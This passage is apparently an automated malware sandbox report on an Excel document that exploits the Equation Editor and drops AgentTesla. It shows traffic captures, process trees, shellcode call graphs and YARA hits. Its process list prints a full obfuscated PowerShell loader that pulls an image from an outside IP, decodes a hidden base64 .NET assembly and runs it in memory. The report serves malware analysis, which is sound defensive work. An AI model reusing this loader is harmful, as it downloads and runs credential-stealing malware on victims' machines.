                  Data Ascii: p\`6d)$,ec)q(6>h|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$jkV1SG*A13E0DoE~52>)X5OnFQM*uQMVy#o\>5$0!\DYX`
                  Jul 5, 2024 06:23:56.579268932 CEST1236INData Raw: 9b 1b 8e 59 08 20 77 ef 81 b5 2f 89 15 06 c9 2d 5c 6d c4 1f 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a
                  Data Ascii: Y w/-\mTr7qLz2iO7ZsiA%nGR?{O|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+ED
                  Jul 5, 2024 06:23:56.579286098 CEST896INData Raw: 80 2a 60 74 ef 64 8b 00 03 63 8e 98 1e 82 09 cb 79 72 9a da 0d d1 1c e0 55 27 3a a2 c1 88 8d 89 24 5f e9 81 f0 fd e8 19 a5 05 a4 6e 83 fc 39 a0 a4 35 58 1f 2b c0 4b 59 a2 d2 95 f3 59 5c 16 34 0a 11 c6 66 a4 fa 8d 1b 95 0c 5e 26 fe 12 6c 30 cd e7
                  Data Ascii: *`tdcyrU':$_n95X+KYY\4f^&l0*8<KHSQ7Y3&S\p)3v'r:/>2HPscb.F$e%*z*IMJ.D7}##H ml6fm"7LyF
                  Jul 5, 2024 06:23:56.658632994 CEST1236INData Raw: 66 63 c8 f9 65 03 79 a4 21 b2 3a 71 db 03 2e c8 9c 24 7b 9a fa fc 06 07 ba 3a c5 79 3c b6 3b 59 7b 91 f8 be 58 b6 b4 02 37 6d e7 bf c7 25 cd 2d 06 2c 3f 17 06 b1 43 36 d6 28 cc d4 dc 82 47 4f ae 00 1d 03 03 e9 c0 ec 01 b6 ed e9 8e 05 3b 6a ab db
                  Data Ascii: fcey!:q.${:y<;Y{X7m%-,?C6(GO;j\0U!BcG|"y nGg. &C*Q^G#qQ$q"pH9`zjxW.VzHIG+V<GAFcqtMEgf`O>tA\o
                  Jul 5, 2024 06:23:56.658653021 CEST1236INData Raw: b4 b7 5c 10 66 00 ed 41 c7 52 70 04 94 d3 2d 1d a4 b1 fe 43 3e e1 f6 47 4a fa 8f d9 77 85 42 8c 81 a6 f1 2d 44 44 c8 c1 7f 1e 9e 64 ee 47 f8 bf f7 e9 9f 0d 7b 0e 18 2f 3f a6 7d ab ec 46 a3 4e 9f b2 c8 75 5a e7 61 1c 3e 36 d2 46 b1 d1 26 a2 06 8f
                  Data Ascii: \fARp-C>GJwB-DDdG{/?}FNuZa>6F&,5UjRG"*{w9?j_H}HO3z9IxoVBjlqQ8eILh,/g>o}+I~:$
                  Jul 5, 2024 06:23:56.658665895 CEST1236INData Raw: cd 75 46 06 58 be fd 14 a5 18 f4 a8 82 d7 d6 b3 16 27 94 fd a0 d5 b0 1b a4 30 81 ea eb d1 70 32 cc c7 c6 4b 95 0a 46 a2 1b 1d ba 1c 0f 4b f6 cb c7 a2 d4 f8 bf 86 6b 22 13 2a ab 02 c8 c4 15 0a ac ad c5 73 d8 67 ae 97 ed 8e 88 23 21 d3 3b 29 17 b8
                  Data Ascii: uFX'0p2KFKk"*sg#!;)|+MYe6]M}GBV)/n^X f{ U/Mv0nQ)R{dvhn C_oz>hqw>qJh,O]4(M3=$prNHs1ixp}
                  Jul 5, 2024 06:23:56.658677101 CEST672INData Raw: d4 1c 0f 4e 9f 69 74 e0 12 21 90 df 52 5b ae 43 f8 ee 9e 48 c0 30 c8 2f b8 6a 39 85 0c 04 8d bd 47 be 1a 5d 2b 42 02 b9 36 39 aa c0 d9 8b c5 b4 0e a5 3c 89 41 5f e2 26 f0 4d e2 30 ed 67 11 b5 76 e4 0f ae 66 42 db 45 91 57 c5 e1 9d 4a a8 25 41 07
                  Data Ascii: Nit!R[CH0/j9G]+B69<A_&M0gvfBEWJ%A(F ey{=^,<7Rg:)%Y14eJ<auz})TI"p=Fqp0kfpU|/e>Oq};3FYmxa|I'4J:B=
                  Jul 5, 2024 06:23:56.658689022 CEST1236INData Raw: 8b 40 da 67 d5 0f 0e d3 10 ac 29 77 3d 76 04 fe 3e c4 af e7 f0 39 da 6f 1b d3 6a 1c ef d0 c2 18 ad 85 4d ec c4 fc 8b f3 f4 ed ce 61 40 cf 14 91 b0 04 a8 24 15 27 f8 4f 0c 3f 2c a2 b4 b0 b9 da 40 ba b0 c0 30 ef 55 63 b7 be 06 9c de 2d 13 9a 1a 38
                  Data Ascii: @g)w=v>9ojMa@$'O?,@0Uc-8)k5,rP6t%C3."b(hf#x`}lhHESFn<u9$<X*6g&G?oVhm['Sj~(|mV&4z!#n9
                  Jul 5, 2024 06:23:56.658700943 CEST1236INData Raw: 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28
                  Data Ascii: 3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{SS,rm zYjd&yvC$j{EMwlg^r u`UDSI NJWEDve+Jz}xhE


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  3192.168.2.2249164192.3.216.14880540C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  TimestampBytes transferredDirectionData
                  Jul 5, 2024 06:23:57.440340042 CEST73OUTGET /base64.txt HTTP/1.1
                  Host: 192.3.216.148
                  Connection: Keep-Alive
                  Jul 5, 2024 06:23:58.022066116 CEST1236INHTTP/1.1 200 OK
                  Content-Type: text/plain
                  Last-Modified: Wed, 03 Jul 2024 15:43:50 GMT
                  Accept-Ranges: bytes
                  ETag: "c32ee7cc5fcdda1:0"
                  Server: Microsoft-IIS/10.0
                  Date: Fri, 05 Jul 2024 04:23:57 GMT
                  Content-Length: 325632
                  Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8DEAAAAMAwAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgCN4TesJWblN3ch9CPK0gPvZmbJR3c1JHdvwDIgoQD+kHdpJXdjV2cvwDIgACIK0gPzV2ZlxWa2lm
                  Jul 5, 2024 06:23:58.022119045 CEST1236INData Raw: 63 51 52 57 5a 30 4e 58 5a 31 46 58 5a 79 39 43 50 67 41 43 49 67 41 43 49 4b 30 67 50 76 49 53 5a 7a 78 57 59 6d 4a 53 50 7a 4e 58 5a 6a 4e 57 51 70 56 48 49 69 49 58 5a 72 39 6d 64 75 6c 30 63 68 4a 53 50 73 56 6d 64 6c 78 47 49 73 56 6d 64 6c
                  Data Ascii: cQRWZ0NXZ1FXZy9CPgACIgACIK0gPvISZzxWYmJSPzNXZjNWQpVHIiIXZr9mdul0chJSPsVmdlxGIsVmdlxkbvlGd1NWZ4VEZlR3clVXclJHPgACIgACIgAiCN4jIzYnLtNXY602bj1Cdm92cvJ3Yp1WLzFWblh2YzpjbyVnI9Mnbs1GegMXZnVGbpZXayBFZlR3clVXclJHPgACIgACIK0gP5RXayV3YlNHPgACIgoQD+IiM25
                  Jul 5, 2024 06:23:58.022131920 CEST1236INData Raw: 41 77 41 41 4d 41 45 41 41 41 45 41 2b 41 41 41 41 76 42 67 5a 41 34 47 41 4a 42 51 5a 41 77 47 41 70 42 67 52 41 63 47 41 75 42 51 61 41 49 48 41 30 42 77 55 41 45 41 41 41 49 41 48 45 41 4c 41 41 41 41 41 41 41 41 41 75 42 77 62 41 6b 47 41 30
                  Data Ascii: AwAAMAEAAAEA+AAAAvBgZA4GAJBQZAwGApBgRAcGAuBQaAIHA0BwUAEAAAIAHEALAAAAAAAAAuBwbAkGA0BQYAwGAzBgbAEGAyBAVAAAAEAAJAAAAAAwbAYGAuBQSAUGAsBQaAYEAyBQYAYFABAAAAQEAAAAAAAAAAAAAAAAAAAQAAAAAEAAAAAAAAAwPAAAAAAQAAAAAAAAAAEAAAAQAAAg/vTQvAAAAAAwTAYEAOBQSA8FAOB
                  Jul 5, 2024 06:23:58.022177935 CEST1236INData Raw: 47 59 6f 67 41 59 67 42 47 34 48 59 45 4b 63 77 44 49 41 65 67 53 67 51 42 64 67 51 42 48 6f 41 43 67 48 6f 45 4a 6b 41 39 42 4b 52 42 48 73 41 34 42 4b 52 41 4e 4a 52 46 48 67 51 42 64 67 64 67 52 6b 41 38 42 4b 52 42 48 77 51 43 42 63 77 41 49
                  Data Ascii: GYogAYgBG4HYEKcwDIAegSgQBdgQBHoACgHoEJkA9BKRBHsA4BKRANJRFHgQBdgdgRkA8BKRBHwQCBcwAIMQHF0B2BGRBdkQCsHoEIcQEHUQHBAQBKUXEBAQBIUQHNIAAGgQBdwgAAYACF0xCCAgBIUQHHIAAGMQHD0B2BGxAHkQIRIQAgUAHc4gDDAgBIESEkHoEJUQHJkA4BKBCHABCI0hEDcgBIESEkHoEIUQHIYwBMgQHSI
                  Jul 5, 2024 06:23:58.022202969 CEST896INData Raw: 42 64 55 51 48 42 4b 6f 45 46 30 52 6a 43 4b 68 44 48 34 52 44 49 45 41 41 45 67 51 42 64 55 51 48 46 30 52 42 64 55 51 48 46 30 52 42 64 55 51 48 49 67 41 43 49 55 51 48 49 67 41 43 49 34 51 49 52 55 51 48 49 59 78 42 6a 67 51 42 64 6b 67 41 41
                  Data Ascii: BdUQHBKoEF0RjCKhDH4RDIEAAEgQBdUQHF0RBdUQHF0RBdUQHIgACIUQHIgACI4QIRUQHIYxBjgQBdkgAAYACAFoEAFoEO4QBdggDIgACI4ACJggDRcAGtJBAAQACIUQHdgQBd0RBdgQBdUQHIowBTgQBdkACEcwBIUQHdkQBdgBCF0xBH0ACF0RCYQwBHgRABAABIkACF0BpBGRBdgBGYkwBPgACIUQHF0RBdYwBLgACIgACF0
                  Jul 5, 2024 06:23:58.022216082 CEST1236INData Raw: 46 45 63 51 46 41 34 52 48 42 45 51 41 51 63 51 55 53 41 41 49 45 34 51 49 43 4b 52 41 41 59 51 42 42 30 6b 45 56 55 67 44 4f 67 41 43 49 67 41 43 4f 30 42 43 49 67 67 44 4f 67 41 43 78 4a 6f 45 46 45 51 54 53 55 52 45 48 6f 42 43 44 30 78 41 64
                  Data Ascii: FEcQFA4RHBEQAQcQUSAAIE4QICKRAAYQBB0kEVUgDOgACIgACO0BCIggDOgACxJoEFEQTSUREHoBCD0xAdMQHI4QHI4gDJcwDA4RAKQAHOEAIEgQbCKhAHYQNOZTrWhzvxggDd4gDCAgB0JRAhDYEVcAC0JRAhDYEVQnEDcAD0JRANJRFGgACO0BQBKhDOUQHF0BgBKhDF0RBdAYgS4gDOgAeBKBWBKRBd4gDAFoEB0kEVcxBvg
                  Jul 5, 2024 06:23:58.022228003 CEST1236INData Raw: 54 42 4b 68 44 46 30 68 44 4f 41 55 67 53 45 51 54 53 55 78 43 48 73 43 44 42 4b 52 41 68 44 59 45 56 67 41 44 42 4b 52 41 4e 4a 52 46 48 77 51 67 53 45 51 54 53 55 68 44 43 45 57 45 56 77 51 41 54 41 77 45 43 45 57 45 56 41 41 49 4b 77 51 67 53
                  Data Ascii: TBKhDF0hDOAUgSEQTSUxCHsCDBKRAhDYEVgADBKRANJRFHwQgSEQTSUhDCEWEVwQATAwECEWEVAAIKwQgSEQTSUhDCUlgRURDBMBATIQVCGRFAAyCMEoEB0kEV4gAdJRFMwQgSEQTSUhDC0lEVEgCOgADBKRAhDYEVwQgSEQTSUhDCUlgRUBQBKRANJRFMEoEMEoEB0kEV4gAhFRFMEoEB0kEV4gAdJRFMFoEOUQHO4AQBKRANJ
                  Jul 5, 2024 06:23:58.022260904 CEST1236INData Raw: 45 4f 34 67 44 4f 34 51 41 4e 4a 52 46 4f 41 55 67 53 45 51 54 53 55 42 45 48 34 43 43 49 55 51 48 49 51 77 42 48 67 41 43 4f 55 51 48 49 4d 41 43 49 67 41 43 46 30 68 44 4d 63 41 45 49 4d 51 48 44 30 78 41 64 4d 51 48 49 34 51 48 41 46 6f 45 4f
                  Data Ascii: EO4gDO4QANJRFOAUgSEQTSUBEH4CCIUQHIQwBHgACOUQHIMACIgACF0hDMcAEIMQHD0xAdMQHI4QHAFoEO0hDO4gDd4gDdggDd4AQBKRANJRFTcgJIggDdggDdAUgS4gDd4gDd4AQBKRANJRFMcgGIggDdggDd4QHO4gDO4gDO0hDO0BQBKRANJRFQcQHI4QFCKhDF0R0BKRFCKRBd4QCHMBCOggAAUACOggDOggDO4QCHsgDOI
                  Jul 5, 2024 06:23:58.022277117 CEST1236INData Raw: 67 53 45 41 49 47 45 66 67 53 41 41 49 46 67 51 65 53 6b 66 67 53 67 67 44 64 41 55 67 53 55 66 67 53 45 66 67 53 30 65 67 53 34 41 51 42 4b 52 41 4e 4a 52 46 4c 63 77 48 49 67 67 44 64 4d 51 48 4f 34 51 48 4f 41 56 67 53 34 41 51 42 4b 52 41 4e
                  Data Ascii: gSEAIGEfgSAAIFgQeSkfgSggDdAUgSUfgSEfgS0egS4AQBKRANJRFLcwHIggDdMQHO4QHOAVgS4AQBKRANJRFKcwFcwhDCAQBIMQAgQACIUQHFggDOcwBKgwAdMQHI4QHF0hDOAUgS4QHOswBUgAQBKBQBKRANJRFDcQDIAwEBASBAGoEB0kEVcQ6BGhDd4QHCASCO4Q5BKhAAcACO0BCO0BQBKRANJRFAFoEOUQHF0BgBKBeBK
                  Jul 5, 2024 06:23:58.022290945 CEST1236INData Raw: 42 5a 4a 42 43 42 41 51 42 42 4d 42 41 54 45 67 41 67 63 67 44 68 45 68 41 64 4a 52 46 48 6b 57 67 53 41 41 49 46 30 57 67 53 41 41 41 46 67 41 47 41 46 6f 45 42 30 6b 45 56 34 51 49 52 49 51 58 53 55 42 51 42 4b 68 44 4f 34 41 47 39 44 6f 45 63
                  Data Ascii: BZJBCBAQBBMBATEgAgcgDhEhAdJRFHkWgSAAIF0WgSAAAFgAGAFoEB0kEV4QIRIQXSUBQBKhDO4AG9DoEc0PgSgBG9DoEY0PgSESE9DoEYwBCYgBCYESEcggDhEhAdJRFYgAGIklEIgQaBKBQBKRANJRFncgUAMRAlFoEVEQAgoASBKRAhDYEVgASBKRANJRFHgASBKRAhDYEVgUgSAUgSEQTSUBBHUBC8EoECcgBIggAHQQYBK
                  Jul 5, 2024 06:23:58.027120113 CEST1236INData Raw: 4c 78 63 41 41 42 77 51 41 7a 64 33 62 79 68 47 56 75 39 57 61 30 42 58 5a 6a 68 58 52 75 39 6d 54 77 46 6d 63 58 5a 68 41 55 42 51 41 41 45 67 48 41 41 41 41 41 41 41 43 41 45 41 43 51 4a 59 45 47 51 41 54 43 47 68 42 45 67 6b 67 52 59 41 42 45
                  Data Ascii: LxcAABwQAzd3byhGVu9Wa0BXZjhXRu9mTwFmcXZhAUBQAAEgHAAAAAAACAEACQJYEGQATCGhBEgkgRYABEJYEGQAQCGhBEwjgRYAB4IYEGQACOggAdJRFBAQCOggAdJRFOggAdJRFBAgDO4gAdJRFAAACO0hD4HYECAACYQhgREAAGoAEYIgAAYAGJARCYghAFAQCYkQCYkQCOgxBAoQCJkAECGBGYUAAKQRAOkQCMIYEYgBGGA


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  4192.168.2.2249165208.95.112.1802888C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  TimestampBytes transferredDirectionData
                  Jul 5, 2024 06:23:59.033638000 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                  Host: ip-api.com
                  Connection: Keep-Alive
                  Jul 5, 2024 06:23:59.532336950 CEST175INHTTP/1.1 200 OK
                  Date: Fri, 05 Jul 2024 04:23:59 GMT
                  Content-Type: text/plain; charset=utf-8
                  Content-Length: 6
                  Access-Control-Allow-Origin: *
                  X-Ttl: 60
                  X-Rl: 44
                  Data Raw: 66 61 6c 73 65 0a
                  Data Ascii: false
                  Jul 5, 2024 06:23:59.742104053 CEST175INHTTP/1.1 200 OK
                  Date: Fri, 05 Jul 2024 04:23:59 GMT
                  Content-Type: text/plain; charset=utf-8
                  Content-Length: 6
                  Access-Control-Allow-Origin: *
                  X-Ttl: 60
                  X-Rl: 44
                  Data Raw: 66 61 6c 73 65 0a
                  Data Ascii: false


                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Click to jump to process

                  Target ID:0
                  Start time:00:23:00
                  Start date:05/07/2024
                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                  Imagebase:0x13fe90000
                  File size:28'253'536 bytes
                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  Target ID:2
                  Start time:00:23:49
                  Start date:05/07/2024
                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Imagebase:0x400000
                  File size:543'304 bytes
                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:5
                  Start time:00:23:52
                  Start date:05/07/2024
                  Path:C:\Windows\SysWOW64\wscript.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\datingloverstartingAgain.vbs"
                  Imagebase:0x710000
                  File size:141'824 bytes
                  MD5 hash:979D74799EA6C8B8167869A68DF5204A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:6
                  Start time:00:23:53
                  Start date:05/07/2024
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('by6link = EnNhttp://91.92.254.194/imge/new-image_v.jpgEnN; by6webClient ='+' New-Object System.N'+'et.WebClient; tr'+'y { by6downloadedData = b'+'y6webClient.DownloadData(by6link) } catch { Write'+'-H'+'ost EnNFailed To download dat'+'a f'+'rom by6linkEnN -ForegroundColor Red; exit }; if (by6downloadedData -ne by6null) { by6ima'+'geT'+'ext = [System.Text.Encoding]::UTF8.GetString(by6downloadedData); by6star'+'tFlag'+' = EnN<<BASE64_START>>EnN; by6endFlag = EnN<<BASE64_END>>EnN; by6startIndex = by6imageText.IndexOf(by6startFlag); by6endIndex = by6ima'+'geTe'+'xt.I'+'ndexOf(by6en'+'dFlag); if (by6startIndex'+' -ge 0 -and b'+'y6endIndex -gt by6startIndex) { by6st'+'artIndex += by6startFl'+'ag.Length; by6base6'+'4Length = by6endIndex - by6startIndex; by6base64Co'+'mmand = by6imageText.Substring(by6startInd'+'ex, by6ba'+'se64Length); by6commandByt'+'es = [System.Convert]::FromBase6'+'4String(by6base64Command); by6loadedAssembly = [System.Reflection.Assembly]::L'+'oad(by6commandBytes); by6t'+'ype = by6loadedAssembly.GetType(EnNRunPE.HomeEnN); by6method = by6type.GetMethod(EnNVAIEnN).Invoke(by6null, [object'+'[]] (E'+'nNtxt.46esab/841.612.3.291//:ptthEnN , EnNdesativadoEnN , '+'EnNdesativa'+'doEnN , EnNdesativadoEnN,EnNA'+'dd'+'InProcess32EnN,EnNEn'+'N)) } }')-CREPLACE([CHar]98+[CHar]121+[CHar]54),[CHar]36 -rEpLaCe([CHar]69+[CHar]110+[CHar]78),[CHar]39)| iex"
                  Imagebase:0xde0000
                  File size:427'008 bytes
                  MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.473828198.00000000033B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.473828198.00000000033B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.473828198.0000000003419000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.473828198.0000000003419000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:true

                  Target ID:8
                  Start time:00:23:57
                  Start date:05/07/2024
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  Imagebase:0xf50000
                  File size:42'056 bytes
                  MD5 hash:EFBCDD2A3EBEA841996AEF00417AA958
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.619369969.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.619369969.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.619828282.0000000002395000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:moderate
                  Has exited:false

                  Reset < >

                    Execution Graph

                    Execution Coverage:16.3%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:54.8%
                    Total number of Nodes:42
                    Total number of Limit Nodes:5
                    execution_graph 264 3620542 265 3620544 264->265 268 3620557 LoadLibraryW 265->268 273 3620571 268->273 274 3620574 273->274 277 36205e6 URLDownloadToFileW 274->277 287 36205ff 277->287 282 362060e ShellExecuteW 302 3620639 282->302 284 3620582 285 362062d 285->284 286 362063c ExitProcess 285->286 288 3620601 287->288 289 3620606 288->289 290 3620614 3 API calls 288->290 291 362060e ShellExecuteW 289->291 293 36205ef 289->293 290->289 292 3620639 ExitProcess 291->292 294 362062d 292->294 296 3620614 293->296 294->293 295 362063c ExitProcess 294->295 297 3620617 ShellExecuteW 296->297 298 3620639 ExitProcess 297->298 299 362062d 297->299 298->299 300 362063c ExitProcess 299->300 301 3620606 299->301 301->282 301->284 303 362063c ExitProcess 302->303 304 3620468 311 362049f 304->311 312 36204a5 311->312 314 36204ac 312->314 317 36204bb 312->317 315 36204f4 314->315 323 3620542 314->323 318 36204c1 317->318 327 36204e2 318->327 324 3620544 323->324 325 3620557 9 API calls 324->325 326 3620549 325->326 328 36204e5 327->328 329 3620542 9 API calls 328->329 330 36204f4 329->330

                    Callgraph

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 36205e6-362060c URLDownloadToFileW call 36205ff call 3620614 6 3620673-362067f 0->6 7 362060e-3620630 ShellExecuteW call 3620639 0->7 9 3620682 6->9 7->9 20 3620632 7->20 10 3620684-3620688 9->10 11 362068a-362068e 9->11 10->11 13 3620696-362069d 10->13 14 36206a3-36206a5 11->14 15 3620690-3620694 11->15 18 36206a1 13->18 19 362069f 13->19 17 36206b5-36206b6 14->17 15->13 15->14 22 36206a7-36206b0 18->22 19->14 20->14 21 3620634-362063e ExitProcess 20->21 25 36206b2 22->25 26 3620679-362067c 22->26 25->17 26->22 28 362067e 26->28 28->9
                    APIs
                    • URLDownloadToFileW.URLMON(00000000,03620582,?,00000000,00000000,?,036204C8,?,036204AC,?,03620492), ref: 036205E8
                      • Part of subcall function 036205FF: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001,?,036204C8,?,036204AC,?,03620492), ref: 03620626
                      • Part of subcall function 036205FF: ExitProcess.KERNEL32(00000000,?,0362062D,?,036204C8,?,036204AC,?,03620492), ref: 0362063E
                    Memory Dump Source
                    • Source File: 00000002.00000002.463516205.0000000003620000.00000004.00000020.00020000.00000000.sdmp, Offset: 03620000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3620000_EQNEDT32.jbxd
                    Similarity
                    • API ID: DownloadExecuteExitFileProcessShell
                    • String ID:
                    • API String ID: 3584569557-0
                    • Opcode ID: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                    • Instruction ID: 0fb4b7955325169d5cf8b001b51cba99ddc68f55b26817917f8f38066aac3ac6
                    • Opcode Fuzzy Hash: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                    • Instruction Fuzzy Hash: 4BF0279058CB743EF612E7740C9EF9A6E189FC2B00F1B0889F5415D4D3E9948814CE6D

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 29 3620614-3620626 ShellExecuteW 31 362062d-3620630 29->31 32 3620628 call 3620639 29->32 34 3620682 31->34 35 3620632 31->35 32->31 36 3620684-3620688 34->36 37 362068a-362068e 34->37 38 36206a3-36206a5 35->38 39 3620634-362063e ExitProcess 35->39 36->37 41 3620696-362069d 36->41 37->38 42 3620690-3620694 37->42 40 36206b5-36206b6 38->40 44 36206a1 41->44 45 362069f 41->45 42->38 42->41 47 36206a7-36206b0 44->47 45->38 49 36206b2 47->49 50 3620679-362067c 47->50 49->40 50->47 51 362067e 50->51 51->34
                    APIs
                    • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001,?,036204C8,?,036204AC,?,03620492), ref: 03620626
                      • Part of subcall function 03620639: ExitProcess.KERNEL32(00000000,?,0362062D,?,036204C8,?,036204AC,?,03620492), ref: 0362063E
                    Memory Dump Source
                    • Source File: 00000002.00000002.463516205.0000000003620000.00000004.00000020.00020000.00000000.sdmp, Offset: 03620000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3620000_EQNEDT32.jbxd
                    Similarity
                    • API ID: ExecuteExitProcessShell
                    • String ID:
